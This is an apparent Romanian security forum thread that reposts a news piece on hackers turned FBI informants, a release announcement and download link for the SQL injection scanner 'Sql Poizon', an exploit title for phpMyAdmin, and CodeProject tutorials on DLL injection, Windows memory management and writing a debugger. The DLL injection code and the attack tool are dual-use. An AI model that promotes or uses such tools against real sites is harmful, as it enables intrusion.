Nytro

Un sfert din hackerii americani lucreaza pentru FBI de Dinu Boboc | 8 iunie 2011 Iata ca motanul Tom si soricelul Jerry se pot intelege. Cel putin atunci cand rolul lui Tom este jucat de autoritatile federale din SUA, iar cel al lui Jerry de infractorii cibernetici. Concluzia vine ca urmare a unui raport publicat de Guardian, potrivit caruia aproape un sfert dintre hackerii din SUA sunt informatorii FBI. Infractorii cibernetici ajung sa lucreze pentru FBI in clipa in care sunt prinsi si amenintati cu inchisoarea pe termen lung. Agentii federali le ofera posibilitatea de a scapa de gratii in schimbul furnizarii unor informatii secrete. Majoritatea hacker-ilor prefera astfel sa isi pastreze libertatea si sa isi puna abilitatile in slujba FBI-ului. Articolul din publicatia Guardian a aparut in contextul in care problema hacking-ului a devenit tot mai delicata, tot mai multe companii fiind afectate de acest flagel. De exemplu, in aprilie, Sony PlayStation Network, Qriocity si Online Entertainment au fost sparte, iar informatiile personale a peste 100 de milioane de useri au fost expuse. Celebrul grup Anonymous si-a concentrat recent eforturile pe Iran si a reusit sa dea publicitatii e-mail-uri ale oficialilor guvernamentali. Google a fost fortat sa anunte ca adresele de e-mail personale ale unor oficiali guvernamentali de top au fost tinta unor atacuri de tip phishing. Toate aceste actiuni au facut ca monitorizarea si prinderea hackerilor sa devina un obiectiv prioritar pentru agentiile guvernamentale. Ziaristii britanici au relevat chiar existenta unor burse in care hackerii fac schimb de informatii personale furate. Specialistii FBI au inceput sa caute pe forumuri si alte tipuri de comunitati online pentru a-i prinde pe infractori. Una dintre cele mai mari provocari ale FBI este cea a gruparilor anarhiste ale asa-numitilor "hacktivists", care au lansat atacuri asupra unor tinte care tin de securitatea nationala a SUA. Ultimul exemplu este cel al Lulz Security, care a lansat un atac chiar asupra unei divizii a FBI, InfraGard. Atacul a fost un protest fata de decizia Pentagonului de a considera ca atacurile cibernetice venite din strainatate sunt niste acte de razboi. Ideea ca hackerii ar putea trece de partea legii nu este deloc ceva nou. In 1995, Kevin Mitnick, unul dintre cei mai cunoscuti hackeri, a fost arestat pentru activitati infractionale in mediul online. Dupa eliberarea sa, in 2002, a devenit consultant pe probleme de securitate, luptand chiar impotriva celor care intreprind activitati de genul celor facute de el in trecut. Intr-un interviu acordat Cnet, in 2009, Mitnick i-a avertizat pe hackerii din intreaga lume, spunand ca ar trebui sa-si concentreze eforturile pe activitati constructive. "Nu-mi calcati pe urme. Cu siguranta, exista alte drumuri si alte moduri in care oamenii pot sa se autoeduce in legatura cu hacking-ul si securitatea pe internet. Astazi exista o piata uriasa", a declarat acesta. Mitnick i-a sfatuit pe hackeri sa nu incalce legea si sa nu lezeze interesele altor oameni sau companii pentru ca nu este ceva moral. Sursa: Un sfert din hackerii americani lucreaza pentru FBI | Hit.ro

Cum ai putea sa renunti la ea? Nu te da batut! Lupta pentru ea! Nu o lasa sa iti scape! Fa tot ce iti sta in putinta si va fi a ta! PS: Eram ironic.

Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool Nu l-am descarcat, nu l-am incercat, nu stiu daca e infectat, executati pe riscul vostru. Greetings All, After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below: New Features: "Look n Feel" is more attractive now. Rich "Context Menu" items. "Results" contain checkboxes to enable selection. "Selected Dork" box is editable now for user convenience. Built-in Browser for "Injection Builder" to check the impact of injection. "Text Bucket" available for "Injection Builder" to save extra data. "Insert Order By" button is added to "Injection Builder". "Internet Browser" with Snapshot and HTML DOM Tree. Bug Fixes: It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay. Progress bar for "Crawler" has been fixed. It will show correct progress now. Error on importing file is fixed now. You can import files from other directories as well. "Searchqu" shows invalid results. It is fixed now. Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool Author: p0!z0neR Download: http://rapidshare.com/files/440158132/Sql_Poizon_v1.1_-_Sqli_Exploit_Scanner_Tool.rar Sursa: Hack Forums

Japanese Inventions - r00tsecurity

Din acest motiv? phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

Introduction to x86 Assembly Language Advantages of High-Level Languages Why program in Assembly ? Here is why... Speed, Efficiency, Debugging, Optimization... Why MASM ? Introduction to 80x86 Assembly Language Materials on the Web Useful books, in no particular order Fundamental Concepts Software Environment Runtime Environment M1.ASM Assembly and C Code Compared More Assembly and C Code Assembly vs. Machine Language Controlling Program Flow Conditional Jumps General-Purpose Registers Typical Uses of General-Purpose Registers x86 Registers x86 Registers, Cont x86 Control Registers MOV, Data Transfer Instructions Ambiguous MOVes: PTR and OFFSET INC and DEC Arithmetic Instructions ADD Arithmetic Instruction ADD vs. INC SUB Arithmetic Instruction SUB vs. DEC CMP instruction Unconditional Jumps Conditional Jumps Conditional Jumps, Cont Conditional Jumps, Cont LOOP Instruction Logical Instructions Logical Instructions, Cont. Shift Instructions SHL and SHR Shift Instructions Shift Instructions Examples Rotate Instructions ROL and ROR, Rotate Without Carry RCL and RCR, Rotate With Carry EQU directive EQU Directive Syntax Tutorial: http://www.c-jump.com/CIS77/ASM/Assembly/lecture.html

Extending Task Manager with DLL Injection By rocky_pulley | 19 May 2005 Cod sursa: http://www.codeproject.com/KB/threads/taskex/taskex.zip Introduction This article shows how to extend the Windows Task Manager application by using DLL injection. There are plenty of articles already that show how to use DLL injection but this article is intended to show you what you can do with it. It also gives you some nice features for Task Manager. This application consists of three separate projects: TaskExApp This is an application that sits in the background waiting for instances of Windows Task Manager to popup. It loops through the top level windows every 1 second looking for instances. When an instance is detected, it will inject the InstallTaskHook DLL into the process. This application has a system tray icon that will show and hide the application dialog box when double-clicked. To end the process, just click the "Exit" button. InstallTaskHook This is a DLL that is injected into the Windows Task Manager application. On injection, it creates an extra menu on the application's main menu called "Extensions". In this menu there is a sub menu "Get Extended Info" which will display a dialog box of extended data for the application that is selected in the processes list. You must select an item in the processes list and the PID field must be visible for this to work correctly. TaskExHook This DLL is injected into the application by the Task Manager hook to get the extended information. Currently the only extra information that it gets is the command line parameter that the application was started with. The following extended information is given on the display dialog: Command Line The command line parameters that the application was started with. File The full path of the executable file. Modules All modules loaded by the application. It's important to note that when this application builds, the DLLs are copied to the System32 directory, this is so that they can be found by the Task Manager application. If they are not copied there then the application won't work correctly, so if it doesn't work, first check to see if these DLLs were copied correctly by the build process. Background I have done extensive work in the past with Windows hooks on many projects, that was my intent when I started this project as well. Then I found the method of using CreateRemoteThread to inject a DLL into a process. I decided to use this method both for a learning exercise and because this is only intended to work on Windows 2000 and XP anyway. The main reason that I created this application was that I constantly need to know the command line parameters of an application, especially java.exe. There are applications out there that show this, but I would like to just have it work from within Windows Task Manager. Screen shots This is the main application window, it's very simple. You can double click the system tray icon to hide it without exiting: Here are the menu items that are added to the Windows Task Manager application: Here is the dialog box that is used to display the extended information: A look at the code The code is fairly light-weight, here are some of the more interesting aspects of the code. From TaskExApp, here is how it installs the InstallTaskHook into the Windows Task Manager: void TaskExDlg::Install(HWND hWnd, DWORD pid) { m_taskManagers.insert(pid); HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid); if (hProcess != NULL) { HANDLE hThread; char szLibPath [_MAX_PATH]; void* pLibRemote = 0; DWORD hLibModule = 0; HMODULE hKernel32 = ::GetModuleHandle("Kernel32"); if( !::GetSystemDirectory(szLibPath, _MAX_PATH)) return; strcat(szLibPath, "\\InstallTaskHook.dll"); pLibRemote = ::VirtualAllocEx( hProcess, NULL, sizeof(szLibPath), MEM_COMMIT, PAGE_READWRITE ); if( pLibRemote == NULL ) return; ::WriteProcessMemory(hProcess, pLibRemote, (void*)szLibPath,sizeof(szLibPath),NULL); hThread = ::CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)::GetProcAddress(hKernel32, "LoadLibraryA"), pLibRemote, 0, NULL ); if( hThread != NULL ) { ::WaitForSingleObject( hThread, INFINITE ); ::GetExitCodeThread( hThread, &hLibModule ); ::CloseHandle( hThread ); } } } The code for the InstallTaskHook to inject the TaskExHook is fairly similar, except that it also un-injects the DLL as well, the DLL is only there during the load process: std::string GetCmdLineData(DWORD pid) { HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid); if (hProcess != NULL) { HANDLE hThread; char szLibPath [_MAX_PATH]; void* pLibRemote = 0; DWORD hLibModule = 0; HMODULE hKernel32 = ::GetModuleHandle("Kernel32"); ::GetSystemDirectory(szLibPath, _MAX_PATH); strcat(szLibPath, "\\TaskExHook.dll"); pLibRemote = ::VirtualAllocEx( hProcess, NULL, sizeof(szLibPath), MEM_COMMIT, PAGE_READWRITE ); if( pLibRemote == NULL ) return "Failed to get command line information...\r\n\r\n"; ::WriteProcessMemory(hProcess, pLibRemote, (void*)szLibPath,sizeof(szLibPath),NULL); hThread = ::CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) ::GetProcAddress(hKernel32, "LoadLibraryA"), pLibRemote, 0, NULL ); if( hThread != NULL ) { ::WaitForSingleObject( hThread, INFINITE ); ::GetExitCodeThread( hThread, &hLibModule ); ::CloseHandle( hThread ); //Now uninject the DLL using FreeLibrary... ::VirtualFreeEx( hProcess, pLibRemote, sizeof(szLibPath), MEM_RELEASE ); if( hLibModule != NULL ) { hThread = ::CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) ::GetProcAddress(hKernel32, "FreeLibrary"), (void*)hLibModule, 0, NULL ); if( hThread != NULL ) { ::WaitForSingleObject( hThread, INFINITE ); ::GetExitCodeThread( hThread, &hLibModule ); ::CloseHandle( hThread ); } } } CloseHandle(hProcess); return "Command Line:\r\n\t" + std::string(g_szCmdLine); } return "Failed to get command line information...\r\n\r\n"; } This code sets the debug privileges so that the application can inject in all other applications: void GetDebugPrivs() { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tp; if (::OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { if ( !::LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ) { ::CloseHandle( hToken ); } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = sedebugnameValue; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if ( !::AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(tp), NULL, NULL ) ) { ::CloseHandle( hToken ); } ::CloseHandle( hToken ); } } Here is where the InstallTaskHook DLL actually creates the menu items and subclasses the main window to capture the menu events: BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { if( (ul_reason_for_call == DLL_PROCESS_ATTACH) ) { EnumWindows(EnumProc, GetCurrentProcessId()); if (g_hWnd) { char sz[256]; SetWindowText(g_hWnd, "Extended Task Manager"); HMENU hMenu = GetMenu(g_hWnd); int numMenus = GetMenuItemCount(hMenu); HMENU hCheck = GetSubMenu(hMenu, numMenus - 1); GetMenuString(hMenu, numMenus - 1, sz, sizeof(sz), MF_BYPOSITION); if (strcmp(sz, "Extensions")) { HMENU hPopup = CreatePopupMenu(); AppendMenu(hPopup, MF_STRING, 2112, "Get Extended Info"); AppendMenu(hMenu, MF_STRING | MF_ENABLED | MF_POPUP, (UINT_PTR)hPopup, "Extensions"); //Subclass the window with our own window procedure. wndProcOriginal = (WNDPROC)SetWindowLong(g_hWnd, GWL_WNDPROC, (LONG)(WNDPROC)FilterProc); DrawMenuBar(g_hWnd); GetDebugPrivs(); } } } return TRUE; } Issues For some reason, some times the Windows Task Manager application will freeze during the injection process. It doesn't happen very often so it's hard to debug. When this does happen, just bring up another instance of Task Manager and kill the previous instance. If anyone can figure out why this happens, please let me know. Also, the application was only tested on Windows XP, but it should work on 2000/XP/2003. Conclusion I hope that this article gave you a good idea on how you can use DLL injection to your advantage. Being able to control another application can give you a lot of power on the system and allow you to make simple modifications to a large application without needing the code for that application. I would also like to acknowledge the Winspy article for introducing me to the CreateRemoteThread method of DLL injection. Sursa: Extending Task Manager with DLL Injection - CodeProject

Windows Memory Management What is Windows Memory Management? - Overview Microsoft has, as of operating system versions Vista SP1 and Windows Server 2008, implemented new technologies, for both resource allocation and security. Several of these new technologies include the Dynamic Allocation of Kernel Virtual Address Space (including paged and non-paged pools), kernel-mode stack jumping, and Address Space Layout Randomization. Basically, the allocation of resources are not fixed, but are dynamically adjusted according to operational requirements. The implementation of these new technologies such as Address Space Layout Randomization are mostly due to the hacker threat of an advanced knowledge of the location of key system components (such as kernel32.dll, ntdll.dll, etc), and are partly due to the Window’s goal of using memory allocation more efficiently by allocation on an as needed basis. In order to understand these new technologies better and be able to use them as a developer, device driver writer, or system’s administrator, this paper will focus on the Windows Memory Manager prior to Vista SP1. How Does the Windows Memory Manager Work? The purpose of this paper is to therefore give a conceptual understanding to those who have struggled with memory management as a whole and to explain why these newer technologies have evolved. It will start with a general view of the Windows Memory Manager, to get more specific as to how Windows manages used and unused memory. To illustrate how memory works, tools from the TechNet SysInternals web sites will be described for memory leaks. The paper will conclude with a brief description of paging lists. The OS Maps Virtual Addresses to Physical Addresses. Because the virtual address space might be larger or smaller than the physical memory on the machine, the Windows Memory Manager has two first-in-rank responsibilities. The first is to translate, or map, a process's virtual address space into physical memory so that when a thread is running in the context of that process reads or writes to the virtual address space, the correct physical address is referenced. The second one is paging some of the contents of memory to disk when it becomes overcommitted. That is, when running threads or system code try to use more physical memory than is currently available-and bringing the contents back into physical memory as needed. One vital service provided by the Memory Manager includes memory-mapped files. Memory-mapping can speed-up sequential file processing due to the fact the data is not sought randomly, and it provides a mechanism for memory-sharing between processes (when they are referencing the same DLL, as there must be only one instance at a time of any DLL. Most virtual pages will not be in physical memory (RAM), so the OS responds to page faults (references to pages not in memory) and loads data from disk, either from the system swap file or from a normal file. Page faults, while transparent to the programmer, have an important impact on performance, and programs should be designed to minimize faults (again, if the data was stored in register, this would prevent reading data from a file on disk or locating data stored in memory to then read that data to write to the system memory address bus connected to the CPU). The wizards from SysInternals contend that the concern is not that there is one process that is hard page faulting, but rather a collection of them hard page faulting. This hard page faulting causes the system to thrash and is a clear indication the system needs more memory. Dynamic memory allocated in heaps must be physically in a paging file. The OS’s memory management controls page movement between physical memory and the paging file and also maps the process’s virtual address to the paging file. When the process terminates, the physical space in the file is deallocated. Windows provides an illusion of a flat virtual address space (4GB), when in reality, there is a much smaller amount of physical memory. The hardware memory management unit of today’s microprocessors provides a way for the OS to map virtual addresses to physical address and it does this in the granularity of a page. The Windows Memory manager implements a demand paged virtual memory subsystem which is another way of saying that it is a lazy allocator. In other words, if you launch an application such as Notepad, it does not launch the entire application and appropriate DLLs into physical memory. It does so as the application demands: as Notepad touches code pages, as it touches data pages, it's at that point where the memory manager will make a connection between virtual memory and physical memory, reading in contents off disk as needed. In short, it is a common misconception that the memory manager reads the entire executable image off of the disk. An example of this can be illustrated using process monitor and setting the filter to something that has been run since a reboot, say, solitaire. After launching solitaire, solitaire is on the disk. Solitaire, as it starts up, is causing page faults, reading pieces of its own executable off of the disk on demand. When you stop the logging of the trace-gathered information and look, you will see an example of a process, sol.exe, reading sol.exe: it is reading itself, faulting itself onto disk. As features of Solitaire are used, you will see sol.exe reading various DLLs, as those DLLs are being virtually loaded -- only the pieces being read are being loaded. Another component of the Windows Memory Manager is memory sharing. For instance, if you have two instances of Notepad, the common misconception is that there are two copies of Notepad and associated DLLs loaded into physical memory. The Windows memory manager will recognize that is a second instance of Notepad, an image that already has pieces of it in physical memory and will automatically connect the two virtual images to the same underlying physical pages. The important part of process startup and applications can take advantage of that and share memory. On 32 bit Windows, 2 GB for each process (user), and 2 GB for the system. Just like applications need virtual memory to store code and data, the operating system also needs virtual memory to map itself, the device drivers that are configured to load, and also to store the data that is maintained by the drivers and the OS (kernel memory heaps). Tools that indicate memory usage often show virtual memory, physical memory, and the working set. The virtual memory counter does not offer a lot of information when troubleshooting memory leaks; virtual memory is used to map the code and data of an application, and an amount that is kept on reserve; that is, most virtual pages will not be in physical memory, so the OS responds to page faults (references to pages not in memory) and loads data from the disk. Therefore the virtual memory counter is not effective when troubleshooting. The private bytes counter indicates the number bytes of private memory that is private to a process -- it cannot be shared with another process. For instance, if you launch Notepad and start typing in text, no other process is interested in that data, so it is private to that process. What About Memory Leaks? How do we determine if we have a memory leak and if so, how do we further determine if it is a process leaking the memory, or if it is in kernel-mode, etc. In Task Manager, there is a memusage counter that is often used to trace source of a leaker. But the memusage counter does not actually indicate the private virtual memory for the process. The private bytes counter in task manager would actually be the virtual memory size. This misleads many who would assume that the virtual memory size would indicate that this is the amount of the virtual address space allocation. For reasons such as this, it is better to gather data by using Process Explorer, a freeware utility written by Mark Russinovitch. This tool uses a device driver to extract all of the relevant system information applicable to the version of Windows that you are running and contains a colorful and itemized display of processes, thread activity, CPU usage (perhaps by threads running that are not accounted for that are consuming CPU clock cycles), and all of the other needed counters available in the actual Windows Performance Monitor counters. Three columns needed, particular to this context, are the private bytes, the private delta, and the private bytes history counters that can be found in the “select columns” choice of the View menu tool bar. Process Explorer shows the “process tree” view in order to reveal which processes are running as child processes under the control of a parent process. The differences are reflected in the colors shown in the logic of the user interface. Pink colors indicate service host processes (svchost.exe) that run off of the Services.exe process. The light blue color shows the processes that are running under the same account as the user, as opposed to a SYSTEM or NETWORK account. The brown color shows processes that are call jobs, which are simply a collection of processes. These counters can be dragged and dropped to show the private bytes column next to the private bytes delta (in which if a negative number pops up means that a process is releasing memory), and the private bytes history. If there is a process leak, it will not be related to the Task Manager memusage counter. The private bytes, the private bytes delta, and the private bytes history, are counters that can be set to examine private virtual memory to determine if it is a process is leaking memory. A case in point is that a process can be using an enormous amount of virtual memory, but most of that could actually not be in use, but kept on reserve. But the private bytes history counter column shows you a relative comparison of private bytes usage in a process with respect to all other processes running in the system. To examine this, download the SysInternals tool TestLimit.exe (or TestLimit64.exe if it is a 64 bit system you're running).The ‘m’ switch on this tool will leak the amount of specified private bytes every one half a second. That is, if you type c:\windows\system32> testlimit –m 5 you are leaking 10 MB of private bytes per second. With Process Explorer open and the private bytes, the private bytes delta, and the private bytes history (a weighted graph indicated by the width of the yellow) counter columns in view, you would see a growth in the cmd.exe process that would depart from a flat yellow line and approach a thick yellow line in the private bytes history counter column. The private bytes delta column would not show a negative sign to the left of any numerical figure, but only a positive number to indicate that it is not releasing any memory. Control-C the testlimit program and the memory is recycled back to machine. What would happen if we did not Control-C (terminate) the process? Would it have exceeded the amount of virtual address space allocated? It would, in fact, be stopped sooner than that by reaching an important private bytes limit called the “commit limit”. The system commit limit is the total amount of private virtual memory across all of the processes in the system and also the operating system that the system can keep track of at any one time. It is a function of two sizes: the page file size(s) (you can have more than one) + (most of) physical memory. The amount of physical memory that the operating system assigns to each process is called its working set. Every process starts out with an empty or zero-sized working set. As the threads of the process begin to touch virtual memory addresses, the working set begins to grow. When the operating system boots up, it has to decide how much physical memory will be given with respect to each process, as well as how much physical memory it needs to keep for itself to both store cached data and to keep free.So the sizes of the working sets of individual processes are ultimately determined by the Windows Memory Manager. The Windows Memory Manager monitors the behavior of each process and then determines the amount of physical memory based on its memory demands and paging rates. In effect, the Windows Memory Manager decides if a process needs to grow or shrink, while trying to satisfy all of these process’s demands as well as the demands of the operating system itself. The above would indicate that application launching would be a time-consuming operation. As of Windows XP, Windows introduced a mechanism to speed up application launching called the logical prefetcher. Windows monitors the page faults (recall that during application start-up, the process reads itself, faulting itself, reading pieces of its own executable, off of disk on demand) during application start-up, and further defines the start-up as the first ten seconds of an application's activity. It saves a record of this information in a prefetch folder that resides in the Windows directory. Deleting these files would only harm system performance because these .pf files were written by a system process and the data was extracted from the kernel. So in terms of the working set, the Task Manager shows this working set with the memusage counter. Process Explorer shows the current and peak working set numbers in a separate counter. The peak working set is the most physical memory ever assigned to a process. Windows automatically shares any memory that is shareable. This means the code: pieces of any executable or DLL. Only one copy of an executable or a DLL is in memory at any one time. This also includes an instance Terminal Server. If several users are logged on and they are using Outlook, one copy of Outlook is read off of disk (or the demanded pieces of it) to be resident in memory. If one user starts using other features of Outlook, they are read off on demand. If a second user starts using those same features, they are already resident in memory. This apart from parts of the executable and the DLLs, file data is also shared. To reiterate, it is not the memusage or the working set counters that are of help in memory leaks. The working set will grow, and then the Memory Manager will decide that it has gotten too big and shrink it. A quick fix is to sometimes add more memory. If one process is “hard page faulting”, that is not an indication that the system needs more memory, although there is a performance impact. If a collection of processes begin to excessively hard page fault, then this is a clear indication that the system needs more memory. Why memusage Working Set Columns are not Memory Leaker Indicators If the working set keeps growing and it reaches a point, the Windows Memory Manager will block that growth because it has decided that this working set is too big, and there are other consumers of physical memory. If, at this point, the process begins to leak virtual memory but is not physically using any more memory, the Memory Manager begins to reuse the physical memory to store new data that it might be referencing through the newly allocated virtual memory. The working set is growing as the threads are touching virtual address spaces and the process is touching different pages that have been brought into the working set; at some point the Memory Manager says enough to that process; that there others that need just as much as you do. So as a process requests a page, the memory manager takes away a page, and, obviously takes the oldest pages away first. That is, pieces of the working set that have not been accessed for the longest time are pulled out. When those pages are pulled out, they are not overwritten, zeroed out, or destroyed, because they do represent a copy of data that was once being used by this process. So Windows keeps those on several paging lists. To understand the performance counters so as to use them and determine if your system needs more physical memory, it is necessary to delve into the internals of how the Windows organizes the memory that is not currently owned by a process. This is memory that is not in a working set. The way that the Windows Memory Manager keeps track of this is that it keeps track of this unassigned memory in one of four paging lists. These unowned pages are organized by type: Free page list Modified page list Standby page list Zero page list It is necessary to start out with the modified and standby page list first. When the Memory Manager pulls a page out of a process's working set, it is pulling out a page that the process may still need. It may have to be reused by that process; it may (being on the standby or modified page list) represent code or a DLL of an image and be reused by another process. The list that the page goes to depends on whether or not the page has been modified or not. If the page gets written to, then the Memory Manager has to ensure that the page gets written back to the file that it came from. That file might be a file that came from disk, such as a data file that is mapped into the process's address space. If the process modifies that page and it gets removed from the processes working set, then the Memory Manager has to make sure that page makes it back to that file on disk that was being modified. If the file has been modified but does not represent data mapped into the virtual address pace, then it may represent private data to that process that it might want to use again. Pages that have not been modified go to the standby list. The modified page list is called the "dirty" list and the standby page list is called the “clean" list. After pages have been written to disk, those pages move from the modified list to the standby list. The pages on the modified or standby list that are brought back into the working set are called soft faults -- not paging file reads or mapped file reads -- because there is no disk I/O. If the data being referenced is no longer in memory because it is back on the file on disk or back on the paging file, then the system would incur a hard fault and have to do a paging read operation and bring it back into memory. The free page list doesn't exist when the system boots and only grows when private memory is returned to the system. Private memory would be a piece of a process address space such as a buffer that contains the text that you have typed into Notepad. When Notepad exits, whether you have saved that data or not, the memory inside the Notepad process address space that contains that private memory is returned to the free list. For example, if you launch Notepad and start typing text, that data is not usable by any other process. The keystrokes are buffered; so other process is interested in that data saved or not. So that memory is returned to the free page list. Private process memory is never reused without first being zeroed.This free page list is where the Memory Manager goes when it needs to perform a page read. When a page fault is occurring, the Memory Manager is going to an I/O that is going to overwrite the contents of the page completely. So when the Memory Manager has a page fault and it needs to find a free page to read a piece from the file in from the disk, it goes to the free list first (if there is anything there). When, however, the free page list gets to be a certain size, a kernel thread called the zero page thread is awakened (this thread is the only thread that runs at priority 0). Its job is to zero out those dirty pages so when Windows needs zeroed pages, it has them at hand. References The Sysinternals Video Library: Troubleshooting Memory Problems, by Mark Russinovitch and David Solomon Windows Internals 4th Edition written by Mark Russinovitch and David Solomon Windows Systems Programming 2nd Edition written by Johnson M. Hart Sursa: Windows Memory Management - CodeProject

Converting ANSI to Unicode and back Doc Lobster String conversion using the C++ Standard Library only Having just looked at ASCII strings to Unicode in C++[^], here's my preferred solution to this part of the never-ending story of string conversion: #include <locale> #include <string> std::wstring widen(const std::string& str) { std::wstring wstr(str.size(), 0); #if _MSC_VER >= 1400 // use Microsofts Safe libraries if possible (>=VS2005) std::use_facet<std::ctype<wchar_t> >(std::locale())._Widen_s (&str[0], &str[0]+str.size(), &wstr[0], wstr.size()); #else std::use_facet<std::ctype<wchar_t> >(std::locale()).widen (&str[0], &str[0]+str.size(), &wstr[0]); #endif return wstr; } std::string narrow(const std::wstring& wstr, char rep = '_') { std::string str(wstr.size(), 0); #if _MSC_VER >= 1400 std::use_facet<std::ctype<wchar_t> >(std::locale())._Narrow_s (&wstr[0], &wstr[0]+wstr.size(), rep, &str[0], str.size()); #else std::use_facet<std::ctype<wchar_t> >(std::locale()).narrow (&wstr[0], &wstr[0]+wstr.size(), rep, &str[0]); #endif return str; } Yes, it does look nasty - but it is the way to go in pure C++. Funny enough, I never found any good and comprehensive documentation on C++ locales, most books tend to leave the topic unharmed. By using the standard constructor of std::locale in the functions, the "C" locale defines the codepage for the conversion. The current codepage can be applied by calling std::locale::global(std::locale("")); before any call to narrow(...) or widen(...). One possible problem with this code is the use of multi-byte character sets. The predefined size of the function output strings expects a 1:1 relationship in size() between the string formats. Sursa: Converting ANSI to Unicode and back - CodeProject

Introduction Building your very own debugger is a great way to understand the workings of a commercially available debugger. In this article, the reader will be exposed to certain aspects of the OS and CPU opcode (x86-32-bit only). This article will show the working of breakpoints and working of OutputDebugString (since we will be handling these two events only) used commonly while debugging. Readers are urged to investigate conditional breakpoint and step wise execution (line by line) that are commonly supported by most debuggers. Run to cursor is similar to breakpoint. Background Before we start, the reader will require basic knowledge of OS. Discussion related to OS is beyond the scope of this article. Please feel free to refer to other articles (or write to me) while reading this. The reader would be required to be exposed to commercially available debuggers (for this article: VS2010) and have debugged applications before using break points. Break Points Breakpoint allows users to place a break in the flow of a program being debugged. The user may do this to evaluate certain conditions at that point in execution. The debugger adds an instruction: int 3 (opcode : 0xcc) at the particular address (where break point is desired) in the process space of the executable being debugged. After this instruction is encountered: The EIP is moved to the interrupt service routine (in this case int 3). The service routine will save the CPU registers (all Interrupt service routines must do this), signal the attached debugger, the program that called DebugActiveProcess(process ID of the exe being debugged) look up MSDN for this API. The debugger will run a debug loop (mentioned in code as EnterDebugLoop() in file Debugger.cpp). The signal from the service routine will trigger WaitForDebugEvent(&de, INFINITE), the debug loop (mentioned in the code as EnterDebugLoop) will loop through every debug signal encountered by WaitForDebugEvent. After processing the debug routine, the debugger will restore the instruction by replacing 0xcc (int 3) with the original instruction and return from the service routine by calling ContinueDebugEvent(de.dwProcessId, de.dwThreadId, DBG_CONTINUE). (Before placing the break point, the debugger must use ReadProcessMemory to get the original BYTE at that memory location). When it returns from an interrupt service routine (using IRET), EIP will point to the next byte to be executed, but we want it to point to the previous byte (the one we restored), this is done while handling the break point. Although a break point service routine is being processed (its EIP is pointing somewhere in a service routine), GetThreadContext will return the value of registers before EIP moves to int 3 service routine. Subtract EIP by 1, use SetThreadContext to set the EIP. OutputDebugString This API is used to display a string on the debug console, the user may use this to display certain state related information or trace. When this API is occurs, OUTPUT_DEBUG_STRING_EVENT event is triggered. An attached debugger will handle this event in the debug loop (mentioned in the code as EnterDebugLoop). The event handling API will provide information of the string relative to the Debuggee's process space. Use ReadProcessMemory to acquire the string (memory dump) from another process. Using the Code The attached code must be referred to at all times while reading this article. The break point (opcode: 0xcc) is introduced by: BYTE p[]={0xcc}; //0xcc=int 3 ::WriteProcessMemory(pi.hProcess,(void*)address_to_set_breakpoint, p, sizeof(p), &d); The second parameter which requires the address where the break point instruction is placed is looked up in a .PDB file (debug symbol file). Through the .PDB file, VS2010 can accurately place the break point at a memory location corresponding to the line of code responsible for generating instructions at that memory location. The above method is commented out, the reason being that I cannot accurately place the break point since I am not using any debug symbols, instead I use ::DebugBreak(); to cause a break point in the process being debugged, refer to the code. Readers are encouraged to try using WriteProcessMemory API instead, I cannot use it for this article as the value of the address :2nd parameter in WriteProcessMemory is not known unless you compile the code (and hope that the OS will allocate the same value for EIP). Break Point Created by VS2010 To readers who have to debug (any) application using VS2010 - if the break point is placed in code (its executable is created with debug setting) using VS2010 IDE (by pressing F9), the memory debug view will not show 0xcc. Reader will have to dump the memory at the point where the break point is created, of course the address location will have to be looked up through the disassembly (since you are currently debugging the application, you could press ALT-8). In the attached code, I have used the value of EIP, we get the value of EIP from the following code (code comments make this self explanatory): UINT EIP=0; //declare some variable _asm { call f //this will push the current eip value on to stack jmp finish f: pop eax //get the last value from the stack, in our case value of eip mov EIP,eax //store the value of eip in some memory push eax //restore the stack ret //return finish: } // print the memory dump BYTE *b=(BYTE*)EIP; for(int i=0; i<200; i++) printf("%x : %x \n",EIP+i,b[i]); The main loop (used by the debugger) refers to void EnterDebugLoop() in file Debugger.cpp. WaitForDebugEvent API is used to handle debug events for any process attached to the callers process using DebugActiveProcess (debuggee's process ID). WaitForDebugEvent(&de, INFINITE); //will wait till a debug event is triggered switch (de.dwDebugEventCode) { case EXCEPTION_DEBUG_EVENT: switch(de.u.Exception.ExceptionRecord.ExceptionCode) { case EXCEPTION_BREAKPOINT: MessageBoxA(0,"Found break point","",0); break; } break; case OUTPUT_DEBUG_STRING_EVENT: { char a[100]; ReadProcessMemory(pi.hProcess,de.u.DebugString.lpDebugStringData, a,de.u.DebugString.nDebugStringLength,NULL); //mentioned earlier to read memory //from another process. printf("output from debug string is: %s",a); } break; } ContinueDebugEvent(de.dwProcessId, de.dwThreadId, DBG_CONTINUE); // After the debug event // is handled, Debugger must call ContinueDebugEvent will enable the debugger to continue (that thread) that reported the debug event. Points of Interest Now we know that it's easy to write your very own debugger / profiling tools. After the basics of writing a simple debugger, readers are encouraged to write more complex debuggers. Sursa: Write Your Own Debugger to Handle Breakpoints - CodeProject

